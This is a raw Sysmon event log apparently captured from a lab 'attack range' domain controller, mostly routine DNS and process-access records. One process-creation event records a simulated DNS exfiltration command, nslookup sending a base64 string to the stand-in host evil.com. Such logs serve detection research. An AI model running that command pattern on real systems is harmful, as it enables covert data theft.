14:21:48.303{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.303{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51206- 10341000x8000000000000000214606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.303{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51206-false127.0.0.1-53domain 10341000x8000000000000000214604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.303{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F045-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.303{2E1864BB-18FC-629A-EE45-000000005F02}59126260C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-F045-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.311{2E1864BB-18FC-629A-F045-000000005F02}4188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-EE45-000000005F02}5912C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvhrj.tmp 2>&1 354300x8000000000000000214601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51205-false127.0.0.1-53domain 354300x8000000000000000214600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51205- 354300x8000000000000000214599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51205-false127.0.0.1-53domain 354300x8000000000000000214598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.729{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51204-false127.0.0.1-53domain 354300x8000000000000000214597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.729{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51204- 354300x8000000000000000214596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.729{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51204-false127.0.0.1-53domain 354300x8000000000000000214595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51203-false127.0.0.1-53domain 354300x8000000000000000214594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51203- 354300x8000000000000000214593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51203-false127.0.0.1-53domain 354300x8000000000000000214592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51202-false127.0.0.1-53domain 354300x8000000000000000214591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51202- 354300x8000000000000000214590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.638{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51202-false127.0.0.1-53domain 354300x8000000000000000214589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.637{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51201-false127.0.0.1-53domain 354300x8000000000000000214588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.637{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51201- 354300x8000000000000000214587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.637{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51201-false127.0.0.1-53domain 354300x8000000000000000214586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.561{00000000-0000-0000-0000-000000000000}7376<unknown process>-udpfalsefalse127.0.0.1-51200-false127.0.0.1-53domain 354300x8000000000000000214585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.561{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51200- 354300x8000000000000000214584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.561{00000000-0000-0000-0000-000000000000}7376<unknown process>-udptruefalse127.0.0.1-51200-false127.0.0.1-53domain 354300x8000000000000000214583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.475{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-51199-false127.0.0.1-53domain 354300x8000000000000000214582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.475{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51199- 354300x8000000000000000214581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.475{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-51199-false127.0.0.1-53domain 354300x8000000000000000214580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-51198-false127.0.0.1-53domain 354300x8000000000000000214579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51198- 354300x8000000000000000214578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-51198-false127.0.0.1-53domain 354300x8000000000000000214577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-51197-false127.0.0.1-53domain 354300x8000000000000000214576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51197- 354300x8000000000000000214575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.474{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-51197-false127.0.0.1-53domain 354300x8000000000000000214574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-51196-false127.0.0.1-53domain 354300x8000000000000000214573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51196- 354300x8000000000000000214572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-51196-false127.0.0.1-53domain 354300x8000000000000000214571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-51195-false127.0.0.1-53domain 354300x8000000000000000214570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51195- 354300x8000000000000000214569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.376{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-51195-false127.0.0.1-53domain 354300x8000000000000000214568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.376{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-51194-false127.0.0.1-53domain 354300x8000000000000000214567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51194- 354300x8000000000000000214566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.376{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-51194-false127.0.0.1-53domain 354300x8000000000000000214565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-51193-false127.0.0.1-53domain 354300x8000000000000000214564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51193- 354300x8000000000000000214563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51192- 354300x8000000000000000214562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.258{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51191- 354300x8000000000000000214561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.170{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51190- 354300x8000000000000000214560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.170{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51189- 354300x8000000000000000214559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.169{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51188- 354300x8000000000000000214558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51187-false127.0.0.1-53domain 354300x8000000000000000214557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51186-false127.0.0.1-53domain 354300x8000000000000000214556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51186-false127.0.0.1-53domain 354300x8000000000000000214555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51185-false127.0.0.1-53domain 354300x8000000000000000214554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.087{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51185-false127.0.0.1-53domain 354300x8000000000000000214553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.026{00000000-0000-0000-0000-000000000000}5596<unknown process>-udpfalsefalse127.0.0.1-51184-false127.0.0.1-53domain 354300x8000000000000000214552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.025{00000000-0000-0000-0000-000000000000}5596<unknown process>-udptruefalse127.0.0.1-51184-false127.0.0.1-53domain 354300x8000000000000000214551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51183-false127.0.0.1-53domain 354300x8000000000000000214550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51183-false127.0.0.1-53domain 354300x8000000000000000214549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51182-false127.0.0.1-53domain 354300x8000000000000000214548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51182-false127.0.0.1-53domain 354300x8000000000000000214547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51181-false127.0.0.1-53domain 354300x8000000000000000214546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.937{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51181-false127.0.0.1-53domain 354300x8000000000000000214545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51180-false127.0.0.1-53domain 10341000x8000000000000000214544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.266{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-EF45-000000005F02}4728C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51180-false127.0.0.1-53domain 10341000x8000000000000000214542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.266{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-EF45-000000005F02}4728C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51179-false127.0.0.1-53domain 10341000x8000000000000000214540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.250{2E1864BB-18FC-629A-EF45-000000005F02}47286396C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-EE45-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51179-false127.0.0.1-53domain 10341000x8000000000000000214538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.250{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-EF45-000000005F02}4728C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 